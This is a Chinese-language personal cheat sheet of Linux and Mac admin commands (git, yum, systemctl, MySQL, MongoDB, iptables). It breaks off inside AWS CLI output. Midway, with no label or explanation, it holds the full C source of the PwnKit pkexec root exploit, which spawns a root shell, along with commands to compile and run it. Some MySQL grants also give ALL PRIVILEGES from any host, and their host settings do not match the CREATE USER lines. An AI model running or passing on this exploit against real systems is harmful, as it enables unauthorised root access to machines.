Mac和Linux下一些常用的命令 - command tips

git config --global pager.branch false

git checkout master
git cherry-pick 37c89cc

git clone https://username:password@github.com/xxxxxx/yyyyyy.git

Host "github.com"
HostName "github.com"
User "username"
IdentityFile ~/.ssh/id_rsa_for_github

git clone https://github.com/xxxxxx/yyyyyy.git

git grep <regexp> $(git rev-list --all -- lib/util) -- lib/util

$ git check-ignore *
node_modules
$ git check-ignore -v *
.gitignore:37:/node_modules	node_modules
$

$ git check-ignore -v node_modules/ Gemfile
.gitignore:37:/node_modules	node_modules/
$

git branch -r | grep -v '\->' | while read remote; do git branch --track "${remote#origin/}" "$remote"; done
git fetch --all
git pull --all

git clone ssh://user_name@git.xxxx.com/git/repository.git && cd repository && git branch -r | grep -v '\->' | while read remote; do git branch --track "${remote#origin/}" "$remote"; done && git fetch --all && git pull --all && cd ..

git checkout -b fix-failing-tests origin/fix-failing-tests

# 安装tree
brew install tree`

# 中文不乱码加参数 -N
tree -N

yum install wget curl
yum install unzip
yum install tree
yum install net-tools
yum install lszrz

$ yum install NetworkManager-tui

$ nmtui

# 安装组件
yum groupinstall "GNOME Desktop" "Graphical Administration Tools"
# 更改系统运行级别
ln -sf /lib/systemd/system/runlevel5.target /etc/systemd/system/default.target
# 重启
reboot

# 可能会抽风，没有图像,只能解析音频信号
ffplay 'rtmp://192.168.187.128/live/room8878'

# 去掉单引号或换用双引号，没发现过问题
ffplay rtmp://192.168.187.128/live/room8878
ffplay "rtmp://192.168.187.128/live/room8878"

-a, --text
       Process a binary file as if it were text; this is equivalent to the --binary-files=text option.

grep --color='auto' -P -n '[^\x00-\x7F]' filename

grep '[[:cntrl:]]' filename

grep '[^[:print:]]' filename

-L, --files-without-match
       Suppress normal output; instead print the name of each input file from which no output would normally have been printed.  The scanning will stop on the first match.

-l, --files-with-matches
       Suppress normal output; instead print the name of each input file from which output would normally have been printed.  The scanning will stop on the first match.  (-l is specified by POSIX.)

$ grep -nri 'nginx' ./ --exclude-dir=02_codes --exclude-dir=04_tickets

-r, --recursive
       Read  all  files under each directory, recursively, following symbolic links only if they are on the command line.  Note that if no file operand is given, grep searches the working directory.  This is equivalent to the -d recurse option.

-R, --dereference-recursive
       Read all files under each directory, recursively.  Follow all symbolic links, unlike -r.

# 安装lspci
sudo yum install pciutils

# 更新PCI ID list
sudo update-pciids

# 密码方式
rsync -P -a -z -e ssh /from/dir/ username@hostname:/to/dir/

# identity file免密方式
rsync -Pav -e "ssh -i $HOME/.ssh/somekey" username@hostname:/from/dir/ /to/dir/

yum -y install epel-release

# 启动服务
systemctl start nginx

# 停止服务
systemctl stop nginx

# 重启服务
systemctl restart nginx

# reload服务
systemctl reload nginx

# 列出服务状态
systemctl status nginx

# 开机启动服务类似于 chkconfig service on
systemctl enable nginx

# 开机停止服务，类似于chkconfig service off
systemctl disable nginx

# 查看服务是否开机启动
systemctl is-enabled nginx

# 查看所有服务状态
systemctl list-unit-files --type=service

# 查看当前运行的服务
systemctl list-units --type service

# 按行切割
split -l 300 file.txt new_prefix

$ gem sources --add https://gems.ruby-china.com/ --remove https://rubygems.org/
$ gem sources -l
https://gems.ruby-china.com
# 确保只有 gems.ruby-china.com

source 'https://rubygems.org/'

# 用户级别
echo "ruby_url=https://cache.ruby-china.com/pub/ruby" >> ~/.rvm/user/db

# CentOS下系统级别
echo "ruby_url=https://cache.ruby-china.com/pub/ruby" >> /usr/local/rvm/user/db

# Ignore Mac DS_Store files
.DS_Store

ntpdate -q 1.cn.pool.ntp.org

yum install bind-utils
yum provides '*bin/nslookup'

find DIR_NAME -type f | wc -l

find ./ -type f -exec du -b  {} + | awk '{print $2 "\t" $1}' | sort -k1

find ./ -not -path "./xxx/*" -type f -exec du -b  {} + | awk '{print $2 "\t" $1}' | sort -k1

-mtime n
       File's data was last modified n*24 hours ago.
       See the comments for -atime to understand how rounding affects the interpretation of file modification times.

                    4
                  <--->
                      -4
                      +------------------------->
                  +4
<-------+----+----+
        |    |    |   |   |   |   |   |
 +------|----|----|---|---|---|---|---|---------->
        |    |    |   |   |   |   |   |
        7    6    5   4   3   2   1   now

curl ipinfo.io
wget -qO- -t1 -T2 ipv4.icanhazip.com
curl myip.ipip.net
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | awk -F'"' '{ print $2}'

## 获取CPU使用率
top -b -n2 | grep 'Cpu(s)' | tail -1 | awk '{print $2 + $4}'
或
top -bn 2 -d 0.01 | grep '^%Cpu' | tail -n 1 | gawk '{print $2+$4+$6}'

## 获取磁盘使用率
df -H --output=source,pcent 2>/dev/null | grep -vE '^Filesystem|tmpfs|cdrom' | while read file_system used
do
    echo "..."
done

ssh -o ServerAliveInterval=10 user@remote-ssh-server-ip

Perl 版本
cat foo.html | perl -MHTML::Entities -pe 'decode_entities($_);'

Python 3 版本
cat foo.xml | python3 -c 'import html, sys; [print(html.unescape(l), end="") for l in sys.stdin]'

$ zip ../myapp.zip -r * .[^.]*

# 创建当前分支上最新 Git 提交的 ZIP 存档
$ git archive --format=zip HEAD > <myapp>.zip

$ mailx -s 'Few files attached' -a file1.txt -a file2.txt someone@some.com

top -d 1
top -d 0.5

ssh-keygen -y -f id_rsa_for_passphrase

$ ssh-keygen -lf xxx.pub
2048 SHA256:MYSd7HJ9LKckp9MOs94ykNmc1AlifpBpBpp35qJQ+9Y carlshen@carl-3.local (RSA)
$

# -N 不执行远程命令
# -f Requests ssh to go to background just before command execution.
# -D 指定绑定地址和端口 [bind_address:]port
# 将来着本地0.0.0.0:10086的流量转发到指定的host中
ssh -f -N -D 0.0.0.0:10086 -i id_rsa_key user@host

echo " 300173226 | news-icon " | awk -F '|' '{  print "src is ["$1"]["$2"]"}; {gsub(/^[ \t]+/,"",$2);gsub(/[ \t]+$/,"",$2);gsub(/^[ \t]+/,"",$1);gsub(/[ \t]+$/,"",$1); print "processed result is ["$1"]["$2"]"};'

awk '{print "\x27" $2 "\x27"}'

awk --re-interval -f xxx.awk

awk 'BEGIN {
       cmd = "date"
       cmd | getline mydate
       print "date is: ", mydate
       close(cmd)
     }'

free | grep 'buffers/cache' | awk '{printf "%.2f", $3/($3+$4)*100}'

# 允许某些domain引用
add_header X-Frame-Options "ALLOW-FROM http://example.com/,https://example.com/";
# 允许同源引用
add_header X-Frame-Options "SAMEORIGIN";
# 拒绝引用
add_header X-Frame-Options "DENY";
# 应用层面删除header或者不加header就是允许全部域名引用

# 设置可被iframe嵌入的网址,如有多个源，使用空格隔开
Content-Security-Policy: frame-ancestors www.baidu.com www.google.com;

ssh-copy-id -i ./id_rsa root@192.168.187.172

# 每隔一秒高亮显示网络链接数的变化情况
watch -n 1 -d netstat -ant

# 高亮循环显示系统启动时间
watch -d uptime

# passenger-config --root
/usr/local/rvm/gems/ruby-2.3.8/gems/passenger-6.0.4
#

# passenger-config --ruby-command
passenger-config was invoked through the following Ruby interpreter:
  Command: /usr/local/rvm/gems/ruby-2.3.8/wrappers/ruby
  Version: ruby 2.3.8p459 (2018-10-18 revision 65136) [x86_64-linux]
  To use in Apache: PassengerRuby /usr/local/rvm/gems/ruby-2.3.8/wrappers/ruby
  To use in Nginx : passenger_ruby /usr/local/rvm/gems/ruby-2.3.8/wrappers/ruby
  To use with Standalone: /usr/local/rvm/gems/ruby-2.3.8/wrappers/ruby /usr/local/rvm/gems/ruby-2.3.8/gems/passenger-6.0.4/bin/passenger start


## Notes for RVM users
Do you want to know which command to use for a different Ruby interpreter? 'rvm use' that Ruby interpreter, then re-run 'passenger-config about ruby-command'.
#
# passenger-config --ruby-command | grep 'To use in Nginx' | awk -F ':' '{print $2}'
 passenger_ruby /usr/local/rvm/gems/ruby-2.3.8/wrappers/ruby
#

# 清理rvm缓存文件
rvm cleanup all

$ curl –sL https://rpm.nodesource.com/setup_10.x | sudo bash -
$ sudo yum install nodejs

$ curl --silent --location https://dl.yarnpkg.com/rpm/yarn.repo | sudo tee /etc/yum.repos.d/yarn.repo
$ sudo yum install yarn
$ yarn --version

export http_proxy="http://proxyAddress:port"; export HTTP_PROXY="http://proxyAddress:port"; export https_proxy="http://proxyAddress:port"; export HTTPS_PROXY="http://proxyAddress:port"

export ALL_PROXY=socks5://proxyAddress:port

# 查看KEY信息
$ openssl rsa -noout -text -in server.key

# 查看CSR信息
$ openssl req -noout -text -in server.csr

# 查看证书信息
$ openssl x509 -noout -text -in ca.crt

# Will only run on odd days:
0 0 1-31/2 * * /path/to/script

# Will only run on even days:
0 0 0-30/2 * * /path/to/script

echo $name | tr '[:lower:]' '[:upper:]'

echo $name | tr '[a-z]' '[A-Z]'

# 统计非隐藏文件/目录的大小
du -sh *

# 统计隐藏文件/目录的大小
du -sh .[!.]*

# 统计全部文件/目录的大小
du -sh .[!.]* *

# 统计全部文件/目录的大小, 并按照大小排序
du -sch .[!.]* * |sort -h

du -sh ./* --exclude=sql_dump

yum install iftop

mysqldump -uusername --databases databasename -p > databasename_`date +%Y%m%d_%H%M%S`.sql

mysql -uusername databasename -p < databasename.sql

mysqldump -uusername -d databasename --compact --no-data -p > databasename.sql

mysql> alter table table_name AUTO_INCREMENT = 100;

SELECT table_schema "DB Name",
        ROUND(SUM(data_length + index_length) / 1024 / 1024, 1) "DB Size in MB"
FROM information_schema.tables
GROUP BY table_schema;

mysql> select CAST(12345 AS DECIMAL(10,2)) as '12345', CAST('56789' AS DECIMAL(10,2)) as '\"56789\"', CAST('4.5s' AS DECIMAL(10,2)) as '\"4.5s\"', CAST('s4.5' AS DECIMAL(10,2)) as '\"s4.5\"';
+----------+----------+--------+--------+
| 12345    | "56789"  | "4.5s" | "s4.5" |
+----------+----------+--------+--------+
| 12345.00 | 56789.00 |   4.50 |   0.00 |
+----------+----------+--------+--------+
1 row in set, 1 warning (0.00 sec)

mysql>

# 安装mysql
wget https://dev.mysql.com/get/mysql80-community-release-el7-3.noarch.rpm
md5sum mysql80-community-release-el7-3.noarch.rpm
yum localinstall mysql80-community-release-el7-3.noarch.rpm

yum install mysql-community-server
yum install mysql-community-devel

systemctl start mysqld
systemctl status mysqld

# 找临时密码
grep 'temporary password' /var/log/mysqld.log

# 修改密码
mysql_secure_installation
- 输入新的root密码
- 启动密码验证插件
- 密码强度选中等或强
- Remove anonymous users - YES
- Disallow root login remotely - N
- Remove test database and access to it - Y
- Reload privilege tables now - Y

# 测试Mysql
mysqladmin -u root -p version

# 添加账户carl在IP为172.25.55.101上的访问
CREATE USER 'carl'@'172.25.55.101' IDENTIFIED BY 'P@ssword';
GRANT ALL PRIVILEGES ON *.* TO 'carl'@'172.25.55.101' WITH GRANT OPTION;

$ tar czvf ~/tmp/info.tar.gz --exclude=test_on_20180827 ./

tar -tvf xxx.tar.gz

--no-same-owner
       extract files as yourself (default for ordinary users)
--same-owner
       try extracting files with the same ownership as exists in the archive (default for superuser)

tar --no-same-owner -xzvf dist_ondeck.tar.gz
tar --same-owner -xzvf dist_ondeck.tar.gz

-C, --directory=DIR
       change to directory DIR

# 将dist_ondeck.tar.gz中的文件解压至./ondeck目录中
tar --no-same-owner -xzvf dist_ondeck.tar.gz -C ./ondeck

less filename

# ethtool em1
Settings for em1:
	Supported ports: [ TP ]
	Supported link modes:   10baseT/Half 10baseT/Full
	                        100baseT/Half 100baseT/Full
	                        1000baseT/Half 1000baseT/Full
	Supported pause frame use: No
	Supports auto-negotiation: Yes
	Supported FEC modes: Not reported
	Advertised link modes:  10baseT/Half 10baseT/Full
	                        100baseT/Half 100baseT/Full
	                        1000baseT/Half 1000baseT/Full
	Advertised pause frame use: Symmetric
	Advertised auto-negotiation: Yes
	Advertised FEC modes: Not reported
	Link partner advertised link modes:  10baseT/Half 10baseT/Full
	                                     100baseT/Half 100baseT/Full
	                                     1000baseT/Half 1000baseT/Full
	Link partner advertised pause frame use: No
	Link partner advertised auto-negotiation: Yes
	Link partner advertised FEC modes: Not reported
	Speed: 1000Mb/s
	Duplex: Full
	Port: Twisted Pair
	PHYAD: 1
	Transceiver: internal
	Auto-negotiation: on
	MDI-X: on
	Supports Wake-on: g
	Wake-on: d
	Current message level: 0x000000ff (255)
			       drv probe link timer ifdown ifup rx_err tx_err
	Link detected: yes
#

:verbose set filetype?

filetype=markdown
      Last set from ~/.vimrc line 1063

set tabstop=4     " tabstop 表示一个 tab 显示出来是多少个空格的长度，默认8
set softtabstop=4 " softtabstop 表示在编辑模式的时候按退格键的时候退回缩进的长度，当使用 expandtab 时特别有用
set expandtab     " 当设置成 expandtab 时，缩进用空格来表示，noexpandtab 则是用制表符表示一个缩进
set autoindent    " 自动缩进
set cindent       " 自动缩进补充
set shiftwidth=4  " 自动缩进空白字符个数

:%retab

r !seq m n

　　m：起始序号
　　n：结束序号

$ brew reinstall openjdk
==> Downloading https://homebrew.bintray.com/bottles/openjdk-14.0.1.mojave.bottle.tar.gz
Already downloaded: /Users/carlshen/Library/Caches/Homebrew/downloads/44add4279f37d89a5cd5e80a8776dac90b324b06512be00eaf3e186675c6561a--openjdk-14.0.1.mojave.bottle.tar.gz
==> Reinstalling openjdk
==> Pouring openjdk-14.0.1.mojave.bottle.tar.gz
==> Caveats
For the system Java wrappers to find this JDK, symlink it with
  sudo ln -sfn /usr/local/opt/openjdk/libexec/openjdk.jdk /Library/Java/JavaVirtualMachines/openjdk.jdk

openjdk is keg-only, which means it was not symlinked into /usr/local,
because it shadows the macOS `java` wrapper.

If you need to have openjdk first in your PATH run:
  echo 'export PATH="/usr/local/opt/openjdk/bin:$PATH"' >> /Users/carlshen/.bash_profile

For compilers to find openjdk you may need to set:
  export CPPFLAGS="-I/usr/local/opt/openjdk/include"

==> Summary
🍺  /usr/local/Cellar/openjdk/14.0.1: 634 files, 319MB
$

sudo ln -sfn /usr/local/opt/openjdk/libexec/openjdk.jdk /Library/Java/JavaVirtualMachines/openjdk.jdk

# 打印红色字体, 其中\e[1;31m是设置红色，\e[0m是还原颜色
echo -e "\e[1;31m This is red text \e[0m This is reset."

# 打印红色背景的字体，
echo -e "\e[1;41m 这是红色背景的字\e[0m 恢复原背景"

npm install -g cloc              # https://www.npmjs.com/package/cloc
sudo apt install cloc            # Debian, Ubuntu
sudo yum install cloc            # Red Hat, Fedora
sudo dnf install cloc            # Fedora 22 or later
sudo pacman -S cloc              # Arch
sudo emerge -av dev-util/cloc    # Gentoo https://packages.gentoo.org/packages/dev-util/cloc
sudo apk add cloc                # Alpine Linux
doas pkg_add cloc                # OpenBSD
sudo pkg install cloc            # FreeBSD
sudo port install cloc           # Mac OS X with MacPorts
brew install cloc                # Mac OS X with Homebrew
choco install cloc               # Windows with Chocolatey
scoop install cloc               # Windows with Scoop

docker run --rm -v $PWD:/tmp aldanial/cloc -- cloc /tmp

ffmpeg -i http://.../playlist.m3u8 -c copy -bsf:a aac_adtstoasc output.mp4

ffmpeg -f gif -i input.gif output.mp4

you-get -c ~/Library/Application\ Support/Firefox/Profiles/xxxxxxxx.default/cookies.sqlite  'https://v.qq.com/x/cover/divl44zx7b2h40k/k00261fum7u.html'

output=$(ps -p "$pid")
if [ "$?" -eq 0 ]; then
  echo "Found"
  echo "$output"
fi

# 安装yum-config-manager
yum install yum-utils

# 查看yum repository
yum repolist [enabled|disabled|all]

# 启用某个yum repository
1. yum-config-manager --enable repository_name # 或者到
2. 到/etc/yum.repos.d目录下，找到要启动的repository的文件，修改enabled字段为1

# 禁用某个yum repository
1. yum-config-manager --disable repository_name
2. 到/etc/yum.repos.d目录下，找到要启动的repository的文件，修改enabled字段为0

# yum安装
yum install ftp

# yum更新
yum update ftp

# yum删除包
yum remove ftp

# yum 列出包
yum list ftp # 某个包
yum list installed # 列出已经安装的包

# 搜索某个包
yum search ftp

# 查看包的信息
yum info ftp

# 查看可更新的包
yum check-update

# yum group 相关
yum grouplist  # 列出所有组
yum groupinstall '虚拟化主机'   # 按组安装，支持中文
yum groupupdate '虚拟化主机'    # 按组更新
yum groupremove '虚拟化主机'    # 安祖删除


# yum 清理cache
yum clean all

# yum 清理metadat
yum clean metadata

# 查看yum源metadata过期时间
yum repolist enabled -v

# 查看yum操作记录列表
yum history 或 yum history list all

# 查看yum某个包的记录
yum history list PACKAGE_NAME

# 查看yum某条操作记录的详细信息
yum history info NUM

# yum回滚
yum history undo NUM

# 查看某个repository下的可用包, 以pgdg96为例
yum --disablerepo="*" --enablerepo="pgdg96" list available

# 查看某几个repository下的可用包,  repository之间用逗号隔开
yum --disablerepo="*" --enablerepo="pgdg96,epel" list available

# 只更新来自某个repository的package
yum --disablerepo="*" --enablerepo="pgdg96,epel" update


# yum security相关
yum --security check-update  # 检查安全更新
yum --security update        # 只更新安全补丁

# 查看包依赖
yum deplist ImageMagick-devel

# 列出所有的包并安装固定版本的包
使用`--showduplicates`列出所有的包，然后指定版本安装
yum list --disablerepo="*" --enablerepo="mysql80-community" --showduplicates


# 跳过公钥检查
使用`--nogpgcheck`跳过公钥检查安装
yum install --nogpgcheck xxxx

Feb  3 12:32:01 wjds-food-new crond[31367]: (deployer) PAM ERROR (Authentication token is no longer valid; new one required)
Feb  3 12:32:01 wjds-food-new crond[31368]: (deployer) FAILED to authorize user with PAM (Authentication token is no longer valid; new one required)

# chage -l deployer
Last password change					: Nov 03, 2020
Password expires					: Feb 01, 2021
Password inactive					: never
Account expires						: never
Minimum number of days between password change		: 1
Maximum number of days between password change		: 90
Number of days of warning before password expires	: 7
#

passwd -x -1 username
chage -M -1 username

python -c 'import yum, pprint; yb = yum.YumBase(); pprint.pprint(yb.conf.yumvar, width=1)'

$ python -c 'import yum, pprint; yb = yum.YumBase(); pprint.pprint(yb.conf.yumvar, width=1)'
Loaded plugins: fastestmirror
{'arch': 'ia32e',
 'basearch': 'x86_64',
 'releasever': '2.1903',
 'uuid': '33f759f5-349a-4c14-bb77-3ccd32b7a675'}
$

$ python -c 'import yum, pprint; yb = yum.YumBase(); pprint.pprint(yb.conf.yumvar, width=1)'
Loaded plugins: extras_suggestions, langpacks, priorities, update-motd
{'arch': 'ia32e',
 'awsdomain': 'amazonaws.com',
 'awsregion': 'us-west-2',
 'basearch': 'x86_64',
 'product': 'core',
 'releasever': '2',
 'target': 'latest',
 'uuid': '3f6395c1-b6c3-45e1-b7e4-aeaa76bf67a6'}
$

$ python -c 'import yum, pprint; yb = yum.YumBase(); pprint.pprint(yb.conf.yumvar, width=1)'
Loaded plugins: fastestmirror
{'arch': 'ia32e',
 'basearch': 'x86_64',
 'contentdir': 'centos',
 'infra': 'stock',
 'releasever': '7',
 'uuid': '679cafd0-f0f5-4bc4-9055-eddca793d302'}
$

$ rpm -q --whatprovides redhat-release
alinux-release-2.1903-4.al7.x86_64
$

$ rpm -q --whatprovides redhat-release
system-release-2-11.amzn2.x86_64
$

$ rpm -q --whatprovides redhat-release
centos-release-7-6.1810.2.el7.centos.x86_64
$

cat >> ./cat_with_variable.txt << EOF
  echo $PATH
EOF

echo /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin

echo $PATH

sudo dscacheutil -flushcache
sudo killall -HUP mDNSResponder

HOMEBREW_NO_AUTO_UPDATE=1 brew install jq

logger -it error -p local1.info "hello world"

sudo /usr/sbin/rsyslogd -f /etc/rsyslog.conf -N1

左边是mongodb查询语句，右边是sql语句。对照着用，挺方便。
db.users.find() select * from users
db.users.find({"age" : 27}) select * from users where age = 27
db.users.find({"username" : "joe", "age" : 27}) select * from users where "username" = "joe" and age = 27
db.users.find({}, {"username" : 1, "email" : 1}) select username, email from users
db.users.find({}, {"username" : 1, "_id" : 0}) // no case  // 即时加上了列筛选，_id也会返回；必须显式的阻止_id返回
db.users.find({"age" : {"$gte" : 18, "$lte" : 30}}) select * from users where age >=18 and age <= 30 // $lt(<) $lte(<=) $gt(>) $gte(>=)
db.users.find({"username" : {"$ne" : "joe"}}) select * from users where username <> "joe"
db.users.find({"ticket_no" : {"$in" : [725, 542, 390]}}) select * from users where ticket_no in (725, 542, 390)
db.users.find({"ticket_no" : {"$nin" : [725, 542, 390]}}) select * from users where ticket_no not in (725, 542, 390)
db.users.find({"$or" : [{"ticket_no" : 725}, {"winner" : true}]}) select * form users where ticket_no = 725 or winner = true
db.users.find({"id_num" : {"$mod" : [5, 1]}}) select * from users where (id_num mod 5) = 1
db.users.find({"$not": {"age" : 27}}) select * from users where not (age = 27)
db.users.find({"username" : {"$in" : [null], "$exists" : true}}) select * from users where username is null // 如果直接通过find({"username" : null})进行查询，那么连带"没有username"的纪录一并筛选出来
db.users.find({"name" : /joey?/i}) // 正则查询，value是符合PCRE的表达式
db.food.find({fruit : {$all : ["apple", "banana"]}}) // 对数组的查询, 字段fruit中，既包含"apple",又包含"banana"的纪录
db.food.find({"fruit.2" : "peach"}) // 对数组的查询, 字段fruit中，第3个(从0开始)元素是peach的纪录
db.food.find({"fruit" : {"$size" : 3}}) // 对数组的查询, 查询数组元素个数是3的记录，$size前面无法和其他的操作符复合使用
db.users.findOne(criteria, {"comments" : {"$slice" : 10}}) // 对数组的查询，只返回数组comments中的前十条，还可以{"$slice" : -10}， {"$slice" : [23, 10]}; 分别返回最后10条，和中间10条
db.people.find({"name.first" : "Joe", "name.last" : "Schmoe"})  // 嵌套查询
db.blog.find({"comments" : {"$elemMatch" : {"author" : "joe", "score" : {"$gte" : 5}}}}) // 嵌套查询，仅当嵌套的元素是数组时使用,
db.foo.find({"$where" : "this.x + this.y == 10"}) // 复杂的查询，$where当然是非常方便的，但效率低下。对于复杂查询，考虑的顺序应当是 正则 -> MapReduce -> $where
db.foo.find({"$where" : "function() { return this.x + this.y == 10; }"}) // $where可以支持javascript函数作为查询条件
db.foo.find().sort({"x" : 1}).limit(1).skip(10); // 返回第(10, 11]条，按"x"进行排序; 三个limit的顺序是任意的，应该尽量避免skip中使用large-number

mongoexport -h localhost -d databse -c collection --type=csv
--fields erpNum,orderId,time,status
-q '{"time":{"$gt":1438275600000}, "status":{"$ne" :"Cancelled"}}'
--out report.csv

mongoexport --uri=uri -c collection --type=csv
--fields erpNum,orderId,time,status
-q '{"time":{"$gt":1438275600000}, "status":{"$ne" :"Cancelled"}}'
--out report.csv

mongoexport --username user --password pass --host host --db dbName --collection coll --type=csv
    --query '{"_created_at": { "$gte" : { "$date" : "2017-12-21T12:57:00.506Z" } }}'

dd if=/dev/zero of=test_file count=20480 bs=1M

pip install scrapy -i https://mirrors.aliyun.com/pypi/simple/

[global]

index-url = https://mirrors.aliyun.com/pypi/simple/

-p     same as --preserve=mode,ownership,timestamps

--preserve[=ATTR_LIST]
       preserve the specified attributes (default: mode,ownership,timestamps), if possible additional attributes: context, links, xattr, all

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell =
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

gcc poc.c
./a.out

wget https://dev.mysql.com/get/mysql80-community-release-el7-6.noarch.rpm
md5sum mysql80-community-release-el7-6.noarch.rpm
sudo yum install mysql80-community-release-el7-6.noarch.rpm
yum install mysql-community-client mysql-community-devel mysql-community-server

获取 GPG 密钥失败：[Errno 14] curl#37 - "Couldn't open file /etc/pki/rpm-gpg/RPM-GPG-KEY-mysql-2022"

rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql-2022

# 安装mysql
wget https://dev.mysql.com/get/mysql80-community-release-el7-6.noarch.rpm
md5sum mysql80-community-release-el7-6.noarch.rpm
sudo yum install mysql80-community-release-el7-6.noarch.rpm
yum install mysql-community-client mysql-community-devel mysql-community-server

# 启动mysql
systemctl start mysqld

# 查找临时密码
grep 'temporary password' /var/log/mysqld.log
# 做基本配置
## 修改密码
mysql_secure_installation
- 输入新的root密码 - 新密码
- 启动密码验证插件
- Remove anonymous users - YES
- Disallow root login remotely - Y
- Remove test database and access to it - Y
- Reload privilege tables now - Y

# 测试Mysql
mysqladmin -u root -p version

# 停下mysql
systemctl stop mysqld.service

# 创建目录
mkdir -p /opt/app

# 拷贝原始数据到/opt/app下
rsync -av /var/lib/mysql /opt/app/

# 修改配置文件/etc/my.cnf，设置datadir为/opt/app/mysql
vi /etc/my.cnf
datadir=/opt/app/mysql

# 重启mysql
systemctl start mysqld.service

[root@localhost ~]# systemctl start mysqld.service
Job for mysqld.service failed because the control process exited with error code. See "systemctl status mysqld.service" and "journalctl -xe" for details.
[root@localhost ~]#
[root@localhost ~]# systemctl status mysqld.service
● mysqld.service - MySQL Server
   Loaded: loaded (/usr/lib/systemd/system/mysqld.service; enabled; vendor preset: disabled)
   Active: failed (Result: exit-code) since 四 2022-05-19 20:42:28 CST; 2s ago
     Docs: man:mysqld(8)
           http://dev.mysql.com/doc/refman/en/using-systemd.html
  Process: 10791 ExecStart=/usr/sbin/mysqld $MYSQLD_OPTS (code=exited, status=1/FAILURE)
  Process: 10768 ExecStartPre=/usr/bin/mysqld_pre_systemd (code=exited, status=0/SUCCESS)
 Main PID: 10791 (code=exited, status=1/FAILURE)
   Status: "Server startup in progress"
    Error: 13 (权限不够)

5月 19 20:42:28 localhost.localdomain systemd[1]: Starting MySQL Server...
5月 19 20:42:28 localhost.localdomain systemd[1]: mysqld.service: main process exited, code=exited, status=1/FAILURE
5月 19 20:42:28 localhost.localdomain systemd[1]: Failed to start MySQL Server.
5月 19 20:42:28 localhost.localdomain systemd[1]: Unit mysqld.service entered failed state.
5月 19 20:42:28 localhost.localdomain systemd[1]: mysqld.service failed.
[root@localhost ~]#

# ll -Z /var/lib/ | grep mysql
drwxr-x--x. mysql   mysql   system_u:object_r:mysqld_db_t:s0 mysql
drwxr-x---. mysql   mysql   system_u:object_r:mysqld_db_t:s0 mysql-files
drwxr-x---. mysql   mysql   system_u:object_r:mysqld_db_t:s0 mysql-keyring
#
# ll -Z /opt/app/
drwxr-x--x. mysql mysql unconfined_u:object_r:usr_t:s0   mysql
#

# 安装semanage命令
yum provides /usr/sbin/semanage
yum install policycoreutils-python

# 拷贝属性
semanage fcontext -a -e /var/lib/mysql /opt/app/mysql
restorecon -R -v  /opt/app/mysql

# 修改后，就可以顺利启动mysql
systemctl restart mysqld.service

# 创建不限制访问的用户
CREATE USER 'abcd'@'%' IDENTIFIED BY 'abc_123Password';
GRANT ALL PRIVILEGES ON *.* TO 'abcd'@'%' WITH GRANT OPTION;

# 创建内网才能访问的用户
CREATE USER 'abcde'@'192.168.%' IDENTIFIED BY 'abc_123Password';
GRANT ALL PRIVILEGES ON *.* TO 'abcde'@'%' WITH GRANT OPTION;

# 创建固定IP才能访问的用户
CREATE USER 'abcdef'@'192.168.187.226' IDENTIFIED BY 'abc_123Password';
GRANT ALL PRIVILEGES ON *.* TO 'abcdef'@'%' WITH GRANT OPTION;

$ ps -ef | grep nginx | grep master
root     10077     1  0 May20 ?        00:00:00 nginx: master process ./nginx
$

$ sudo ls -alF /proc/10077/exe
lrwxrwxrwx 1 root root 0 May 27 10:44 /proc/10077/exe -> /opt/nginx/sbin/nginx*
$

# 替换文件
echo 'something' | sudo tee file.txt

# append到文件
echo 'something' | sudo tee -a file.txt

sudo bash -c "echo 'something' > file.txt"
sudo bash -c "echo 'something' >> file.txt"

service iptables start  # 启动 iptables
service iptables stop   # 停止 iptables
service iptables restart  # 重启 iptables
service iptables status  # 查看 iptables的状态

chkconfig iptables on  # 设置开机启用防火墙
chkconfig iptables off  # 设置开机停用防火墙

/etc/sysconfig/iptables

service iptables save   # 保存内存中的条目到配置文件/etc/sysconfig/iptables中

iptables -L -n --line-numbers     # 查看防火墙条目

# -A 是追加规则到末尾
# 例如: 只允许IP为192.168.187.1的客户端访问22端口,并追加到最末尾
iptables -A INPUT -p tcp -m state --state NEW --source 192.168.187.1 --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP

# -I 是指定条数插入
# 开启22端口的访问，其中-I INPUT ${num} 是将该规则设置到第num条的意思
iptables -I INPUT 4 -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT

# -D 是删除指定条数的规则
# 删除规则, -D INPUT ${num}, 是将第num条规则删除。
iptables -D INPUT 5

logrotate -v -f /etc/logrotate.d/test.conf

Ignoring /etc/logrotate.d/test.conf because of bad file mode.

/var/log/rails/production.log
{
    daily
    missingok
    rotate 14
    compress
    delaycompress
    notifempty
    su railsuser railsuser
    sharedscripts
    postrotate
        /bin/kill -HUP `cat /var/run/nginx.pid 2> /dev/null` 2> /dev/null || true
    endscript
}

sudo yum install -y gcc-c++

aws autoscaling describe-launch-configurations --launch-configuration-names AutoScaling-Test

{
    "LaunchConfigurations": [
        {
            "UserData": "",
            "EbsOptimized": false,
            "LaunchConfigurationARN": "arn:aws:autoscaling:us-west-2:XXXXXXXXXXXX:launchConfiguration:51f10b39-59a2-489e-a72f-efdc418fe910:launchConfigurationName/AutoScaling-Test",
            "InstanceMonitoring": {
                "Enabled": false
            },
